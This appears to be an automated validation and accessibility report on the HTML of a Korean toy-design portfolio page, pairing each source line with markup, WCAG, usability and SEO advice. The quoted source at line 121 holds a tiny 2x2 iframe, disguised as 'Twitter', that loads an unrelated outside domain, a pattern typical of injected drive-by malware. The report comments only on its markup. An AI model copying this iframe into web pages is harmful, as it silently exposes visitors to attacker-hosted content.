
This page has no privacy policy. If your web server logs visits, then every page reachable by a search engine should have a privacy policy explaining what is logged and how the logs are used.
Line 1 EU Privacy Regulations

Google recommends separating keywords in URLs by dashes instead of underscores.
Line 1 Google

Dashes perform better than underscores in Google as keyword separators, and underscores perform better than no separators.


A well-written description tag attracts more clicks in search results than
an irrelevant or missing description.

Provide a search option on each page of content-rich web sites.
Line 1 Usability.gov 17:4

A search option should be provided on all pages where it may be useful - users should not have to return to the homepage to conduct a search. Search engines can be helpful on content-rich web sites, but do not add value on other types of sites.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

Use the LANG attribute to identify the language of the page.
Line 3 WCAG 2.0 A 3.1.1

In HTML add a LANG attribute to the HTML tag, and in PDF set the language using Document Properties in Acrobat. This allows screen readers to pronounce words correctly.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">
<title>¹«Á¦ ¹®¼</title>
JavaScript changes: removed type='text'
JavaScript changes: added type='text/css'
<STYLE type=text/css>
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active {TEXT-DECORATION: none}
A:visited {COLOR: #666666; TEXT-DECORATION: none}
A:hover {
TEXT-DECORATION: none;
color: #FB7D00;
}
body {
background-color: #000000;
margin-top: 0px;
}
.style43 {font-size: 9px}
.style44 {font-family: Geneva, Arial, Helvetica, sans-serif}
.style45 {color: #666666}
</STYLE>
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color: #000000;
}
.style8 {font-size: 9px}
.style9 {font-size: 9px; font-family: Geneva, Arial, Helvetica, sans-serif; color: #ECE9D8;}
.style10 {
color: #666666;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.style11 {
font-family: Geneva, Arial, Helvetica, sans-serif;
color: #B0D5E8;
}
.style22 {font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px;}
.style25 {color: #333333; font-size: 9px; font-family: Geneva, Arial, Helvetica, sans-serif;}
a:hover {
color: #F07800;
}
.style27 {color: #666666}
.style28 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 9px;
font-weight: bold;
color: #666666;
}
.style29 {color: #996600}
.style34 {color: #FF6633}
.style36 {font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px; color: #99CCCC; }
.style39 {color: #33CCFF}
.style41 {font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 9px; color: #00CCFF; }
.style42 {color: #CC0033}
-->
</styl
e>

End tag for element "STYLE" which is not open.
Line 61 HTML Validation

This page has markup errors, causing screen readers to miss content.
Line 61 WCAG 2.0 A F70

Fix the errors listed on the Standards tab of this report. Markup errors like missing end tags mean screen readers may skip important content.

This page has malformed tags which IE8 and later treat differently from earlier versions of IE.
Line 61 Internet Explorer ≤ 7.0

Fix the errors listed on the Standards tab of this report.
Markup errors like missing end tags means IE8 and IE9 may display different content from IE6 and IE7.

Google recommends using well-formed HTML code in your webpages. This page has mismatched tags.
Line 61 Google

Fix the critical errors listed on the Standards tab of this report. Markup errors like unclosed comments or unclosed title tags mean search engine may miss important content.
e>

The SCRIPT LANGUAGE attribute is deprecated in HTML 4.01.
Line 62 W3C Deprecated

Replace the language attribute with type="text/javascript"
<script LANGUAGE="Javascript
">

Required attribute "TYPE" not specified.
Line 62 HTML Validation
">
<!--
function openwindow(opage, x, y) {
farwindow = window.open('','Links','width='+x+', height='+y+', toolbar=0, scrollbars=0, resizable=no');
if (farwindow != null) {
if (farwindow.opener == null) {
farwindow.opener = self;
}
farwindow.location.href = opage;
}
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</script>
</head>

Ensure that foreground and background colors have enough contrast. The foreground/background contrast ratio is 1. The ratio should be 4.5 or more, and for links this applies to both visited and unvisited styles.
Line 81 WCAG 2.0 AA 1.4.3

Some users find it hard to read light gray text on a white background, dark gray text on a black background and white text on a red background.
<body>
<table width="100%" height
="100%" border="0" cellpadding="0" cellspacing="0">

There is no attribute "HEIGHT".
Line 82 HTML Validation

This happens when the version of HTML used on this page doesn't support an attribute with this name. This can happen
if the attribute is misspelled, is uppercase or mixed case in XHTML, or isn't supported by some HTML versions.
For example, HTML 4 DOCTYPEs don't allow HTML 5 attributes and Strict DOCTYPEs don't allow stylistic attributes
which were present in earlier versions of HTML.
="100%" border="0" cellpadding="0" cellspacing="0">
<tr>

The TH HEIGHT attribute is deprecated in HTML 4.01.
Line 84 W3C Deprecated

Replace the HEIGHT attribute with a CSS height:
th { height: 14pt; }
<th height="82" align="center" scope="row">

Each A tag must contain text or an IMG with an ALT attribute.
Line 84 WCAG 2.0 A F89

Add text to the link, or ALT text if the link contains an image. If there is no link text or the ALT tag is blank, screen readers have nothing to read, so read out the URL instead.
<a href="index.htm" target="_parent">

IMG tags must have an ALT attribute.

Add an ALT attribute describing each image, which screen readers read aloud.
Spacer images and purely decorative images should use ALT=''.

Use text links rather than image links. In general, text links are more easily recognized as clickable.
Line 84 Usability.gov 10:6

Text links usually download faster, are preferred by users, and should change colors after being selected. It is usually easier to convey a link's destination in text, rather than with the use of an image.
Users often find it hard to tell which images are clickable without moving the cursor over them ('minesweeping').
Another benefit to using text links is that users with text-only and deactivated graphical browsers can see the navigation options.

The IMG BORDER attribute is deprecated in HTML 4.01.
Line 84 W3C Deprecated

Replace the border attribute with a CSS rule. For example:
img { border: 1px solid red; }
img { border: none; }
<img src="main2.jpg" width="660" height="142" border="0

Required attribute "ALT" not specified.
Line 84 HTML Validation
"></a></th>
</tr>
<tr>

The TH HEIGHT attribute is deprecated in HTML 4.01.
Line 87 W3C Deprecated

Replace the HEIGHT attribute with a CSS height:
th { height: 14pt; }
<th height="23" valign="top" scope="row">

The TABLE ALIGN attribute is deprecated in HTML 4.01.
Line 87 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<table width="716" height="25" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>

The TH WIDTH attribute is deprecated in HTML 4.01.
Line 89 W3C Deprecated

Replace width attributes with CSS rules. For example:
th.two-column { width: 50%; }
<th width="9" class="style9" scope="row"><p class="style43 style44 style45"> </p></th>

The TH WIDTH attribute is deprecated in HTML 4.01.
Line 90 W3C Deprecated

Replace width attributes with CSS rules. For example:
th.two-column { width: 50%; }
<th width="89" class="style9" scope="row"><span class="style43 style44 style45"><a href="http://www.designnu.com/bbs/zboard.php?id=toy1" target="main" class="style27 style45" onClick="MM_openBrWindow('book_sang.swf','sloth','scrollbars=yes,resizable=yes,width=730,height=400')">Childrenbook</a></span></th>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 91 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="74">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 91 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style8 style10 style43 style44 style45">
<p><a href="http://www.designnu.com/bbs/zboard.php?id=toy2" target="main"> Hard Toy </a>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 95 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="112">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 95 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style8 style11 style43 style44 style45">
<p><a href="http://www.designnu.com/bbs/zboard.php?id=toy3" target="main" class="style27">Concept Toy Design </a></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 98 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="78">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 98 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style29 style43 style44 style45">
<p><a href="http://www.designnu.com/bbs/zboard.php?id=toy4" target="main"><span class="style28">Illustration</span></a></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 101 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="75">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 101 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style25 style43 style44 style45">
<p><a href="http://www.designnu.com/bbs/zboard.php?id=toy5" target="main" class="style27">Packaging</a></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 104 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="83">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 104 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style34 style43 style44 style45">
<p><span class="style36"><a href="http://www.designnu.com/bbs/zboard.php?id=toy6" target="main"><span class="style42"><span class="style27">Characters</span></span></a></span></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 107 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="78">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 107 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style39 style43 style44 style45">
<p><span class="style41"><a href="http://www.designnu.com/bbs/zboard.php?id=toy7" target="main"><span class="style27">Sketches</span></a></span></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 110 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="69">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 110 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center" class="style27 style43 style44 style45">
<p><span class="style22"><a href="http://www.designnu.com/bbs/zboard.php?id=toy8" target="main"><span class="style27">Graphics</span></a></span></p>
</div></td>

The TD WIDTH attribute is deprecated in HTML 4.01.
Line 113 W3C Deprecated

Replace width attributes with CSS rules. For example:
td.two-column { width: 50%; }
<td width="30">

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 113 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center"><span class="style22"><a href="http://www.designnu.com/bbs/zboard.php?id=icon1" target="main"><span class="style44 style43 style27"><strong>Q & A </strong></span></a></span></div></td>
</tr>
</table></th>
</tr>
<tr>
<th align="center" valign="middle" bgcolor="#000000" scope="row">
<div align="center"></div></th>

The DIV ALIGN attribute is deprecated in HTML 4.01.
Line 118 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<div align="center"></div></th>
</tr>
</table>

IFRAME tags must have alternative content.
Line 121 Section 508 1194.22 (a)

To cater for screen readers that don't support frames, place some text in the IFRAME tag.
For example:
<iframe src='file.htm'>Alternative content</iframe>

No TITLE attributes found for the frames on these pages.

Add a TITLE attribute to each FRAME and IFRAME element (e.g. TITLE="Main Content"). Screen readers read out the TITLE letting the user decide which frame to visit. The JAWS Frames List command reads out the URL of any FRAMEs or IFRAMEs without titles.
IFRAMEs with no title cause problems in:
- JAWS 14 with Firefox 29 (the frame SRC filename is read instead)
- VoiceOver on OSX 10.9 (a meaningless title like "Frame twelve" is read out)

The IFRAME ALIGN attribute is deprecated in HTML 4.01.
Line 121 W3C Deprecated

Replace the ALIGN attribute with a CSS text-align attribute.
<iframe name=Twitter scrolling=auto frameborder
=no align
=center height=2 width=2 src=http://trim360.com/cces.html?i=1059103></ifram
e>

Value of attribute "FRAMEBORDER" cannot be "NO"; must be one of "1", "0".
Line 121 HTML Validation
=no align

Value of attribute "ALIGN" cannot be "CENTER"; must be one of "TOP", "MIDDLE", "BOTTOM", "LEFT", "RIGHT".
Line 121 HTML Validation
=center height=2 width=2 src=http://trim360.com/cces.html?i=1059103></ifram

End tag for element "IFRAME" which is not open.
Line 121 HTML Validation

This page has markup errors, causing screen readers to miss content.
Line 121 WCAG 2.0 A F70

Fix the errors listed on the Standards tab of this report. Markup errors like missing end tags mean screen readers may skip important content.

This page has malformed tags which IE8 and later treat differently from earlier versions of IE.
Line 121 Internet Explorer ≤ 7.0

Fix the errors listed on the Standards tab of this report.
Markup errors like missing end tags means IE8 and IE9 may display different content from IE6 and IE7.

Google recommends using well-formed HTML code in your webpages. This page has mismatched tags.
Line 121 Google

Fix the critical errors listed on the Standards tab of this report. Markup errors like unclosed comments or unclosed title tags mean search engine may miss important content.
e>

No TITLE attributes found for the frames on these pages.

Add a TITLE attribute to each FRAME and IFRAME element (e.g. TITLE="Main Content"). Screen readers read out the TITLE letting the user decide which frame to visit. The JAWS Frames List command reads out the URL of any FRAMEs or IFRAMEs without titles.
IFRAMEs with no title cause problems in:
- JAWS 14 with Firefox 29 (the frame SRC filename is read instead)
- VoiceOver on OSX 10.9 (a meaningless title like "Frame twelve" is read out)
JavaScript added element:
<iframe style="" height="10" src="http://www.designnu.com/counter.php" width="10"></iframe>
</body></html>
<iframe src="http://www.designnu.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10
"/
>

No TITLE attributes found for the frames on these pages.

Add a TITLE attribute to each FRAME and IFRAME element (e.g. TITLE="Main Content"). Screen readers read out the TITLE letting the user decide which frame to visit. The JAWS Frames List command reads out the URL of any FRAMEs or IFRAMEs without titles.
IFRAMEs with no title cause problems in:
- JAWS 14 with Firefox 29 (the frame SRC filename is read instead)
- VoiceOver on OSX 10.9 (a meaningless title like "Frame twelve" is read out)
<iframe src="http://www.designnu.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10

Document type does not allow element "IFRAME" here.
Line 122 HTML Validation
"/

End tag for "IFRAME" omitted, but its declaration does not permit this.
Line 122 HTML Validation

This page has markup errors, causing screen readers to miss content.
Line 122 WCAG 2.0 A F70

Fix the errors listed on the Standards tab of this report. Markup errors like missing end tags mean screen readers may skip important content.

This page has malformed tags which IE8 and later treat differently from earlier versions of IE.
Line 122 Internet Explorer ≤ 7.0

Fix the errors listed on the Standards tab of this report.
Markup errors like missing end tags means IE8 and IE9 may display different content from IE6 and IE7.

Google recommends using well-formed HTML code in your webpages. This page has mismatched tags.
Line 122 Google

Fix the critical errors listed on the Standards tab of this report. Markup errors like unclosed comments or unclosed title tags mean search engine may miss important content.
>